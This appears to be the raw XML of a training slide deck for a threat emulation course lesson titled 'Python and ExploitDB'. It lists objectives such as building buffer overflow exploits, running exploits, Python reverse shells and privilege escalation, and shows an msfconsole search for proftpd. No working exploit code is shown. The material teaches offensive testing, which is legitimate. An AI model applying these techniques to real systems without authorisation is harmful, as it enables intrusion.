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6910C0" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="4695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641DAC18" wp14:editId="615FF081">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>944880</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>160020</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="11247120" cy="3238500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="340709" name="Picture 3407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09" name="Picture 34070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2471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389A7242" wp14:editId="181E2F50">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>3886200</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="12192000" cy="2971800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="340711" name="Picture 3407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11" name="Picture 34071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2"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="82"/>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t>ython</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="82"/>
        </w:rPr>
        <w:t xml:space="preserve"> and ExploitDB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B49608" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Course Objectives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FEC632E" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="4" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="349" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>After completing this course, students will be able to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA5D757" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="4" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="552"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>Summarize the CTE squad's responsibilities, objectives, and deliverables from each CPT stage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274319B8" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="3" w:line="264" w:lineRule="auto"/>
        <w:ind w:hanging="552"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:t>Analyze threat information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543E7E03" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="4" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="552"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>Develop a Threat Emulation Plan (TEP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C750E94" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="4" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="552"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>Generate mitigative and preemptive recommendations for local defenders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BD4DA3" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="3" w:line="264" w:lineRule="auto"/>
        <w:ind w:hanging="552"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:t>Develop mission reporting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46582215" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="3" w:line="264" w:lineRule="auto"/>
        <w:ind w:hanging="552"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:t>onduct participative operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E205E7D" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="5" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="552"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:t>Conduct reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD5B999" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="4" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="552"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Analyze network logs for offensive and defensive measures</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5909C1AA" wp14:editId="66577A09">
            <wp:extent cx="2133600" cy="1036320"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="340714" name="Picture 3407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14" name="Picture 34071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1AC4" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="4"/>
        <w:ind w:left="31" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="72"/>
        </w:rPr>
        <w:t>Course Objectives (Continued)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D95B888" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="4" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="373" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>Students will also be able to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D4FF77" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="4" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="552"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>Analyze network traffic and tunneling protocols for offensive and defensive measu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>res</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D594BB3" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="4" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="552"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>Plan non-participative operations using commonly used tools, techniques and procedures (TTPs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B9F934" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="314"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Module 2: Threat Emulation (Objectives)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9A1E4E" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="5" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:t>Conduct reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558944B7" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="4" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>Generate mission reports from non-participative operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1E0B08" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="3" w:line="264" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:t>Plan a non-participative operation using social engineering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3199F09F" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="3" w:line="264" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:t>Plan a non-participative operation using Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B0DEDF" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="4" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>Analyze network logs for offensive and defensive measures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11630C6C" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="35" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>Analyze network traffic and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve"> tunneling protocols for offensive and defensive measures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE04502" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="3" w:line="264" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:t>Plan a non-participative operation using Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C412EC" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="5" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:t>Develop fuzzing scripts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7216E696" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="3" w:line="264" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Develop buffer overflow exploits</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44F19EF5" wp14:editId="046C083B">
            <wp:extent cx="1409700" cy="1066800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3435" name="Picture 3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" name="Picture 343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F642" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="164"/>
      </w:pPr>
      <w:r>
        <w:t>Module 2 — Lesson 12: Python and ExploitDB Objectives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2C4639" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="63" w:line="264" w:lineRule="auto"/>
        <w:ind w:hanging="552"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:t>Interpret exploit code and Metasploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:t xml:space="preserve"> modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138EE97A" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="83" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="552"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:t>Execute exploit on target machine with Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9FAEF5" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="4" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="552"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>Perform privilege escalation on target with Python</w:t>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4507CB57" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="32"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Refresher</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57109674" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="55" w:line="264" w:lineRule="auto"/>
        <w:ind w:hanging="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:t xml:space="preserve">Yesterday, the main takeaways were: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F847023" wp14:editId="56CECB1A">
            <wp:extent cx="83820" cy="83820"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="8234" name="Picture 8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" name="Picture 823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 Python urllib/requests Modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3268D5C7" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="74" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="576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56527CDC" wp14:editId="358CEAA6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93081"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="8287" name="Picture 8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" name="Picture 828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93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Python re/BeautifulSoup Modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADE13DF" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="549" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>Python base64 Module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AD5763" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="4" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>Exercise to practice with each of those libraries and find vulnerabilities in a web server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FE30BA" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C">
      <w:pPr>
        <w:sectPr w:rsidR="007A5F0C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9200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="1401" w:right="1596" w:bottom="180" w:left="1485" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:titlePg/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AA03F83" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="1222" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="-5" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="60"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">I </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B16CD2" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="193"/>
        <w:ind w:left="286" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="72"/>
        </w:rPr>
        <w:t>Lesson Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A85ACE" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="51"/>
        <w:ind w:left="298" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="62"/>
        </w:rPr>
        <w:t>In this lesson we will discuss:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B05240" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:t>ExploitDB introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6150362E" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="179"/>
        <w:ind w:hanging="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="56"/>
        </w:rPr>
        <w:t>searchsploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3B6B7F" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="72"/>
        <w:ind w:hanging="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="58"/>
        </w:rPr>
        <w:t>Python reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B97D522" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="3"/>
        <w:ind w:hanging="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="56"/>
        </w:rPr>
        <w:t>Exploitation, callback &amp; privilege escalation exercise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD845B5" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="136"/>
        <w:ind w:left="301" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="68"/>
        </w:rPr>
        <w:t>Returning to the Metasploit Framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F6E7C0" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="152" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>msfconsole provides a rudimentary way to search for exploits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C259708" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="273" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:t>This is command-line based, and limited to only Metasploit modules.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691FBF22" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="2131" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="60"/>
        </w:rPr>
        <w:t>= [ metasploit v4. 16.60-dev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F46228" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="4"/>
        <w:ind w:left="2941" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="72"/>
        </w:rPr>
        <w:t>1771 exploits - 1010 auxiliary - 307 post</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1766541A" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="7671"/>
        </w:tabs>
        <w:spacing w:after="5" w:line="265" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:tab/>
        <w:t>537 payloads - 41 encoders - 10 nops</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB52C6F" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="72"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="66"/>
        </w:rPr>
        <w:t>Free Metasploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="66"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pro trial: http : //r-7 . co/trymsp ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007677A5" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="271" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="60"/>
        </w:rPr>
        <w:t>msf &gt; search proftpd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD895D5" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="72"/>
        <w:ind w:left="259" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="58"/>
        </w:rPr>
        <w:t>[ ! ] Module database cache not built yet, using slow search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF9029F" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="4"/>
        <w:ind w:left="250" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="72"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>What if you could search for any general exploit code?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E63E77" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="182" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>There are a handful of POC (Proof-of-Concept) exploit scripts available</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A12BD44" wp14:editId="3BF3C72D">
            <wp:extent cx="38100" cy="38100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18513" name="Picture 18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" name="Picture 1851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379F" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
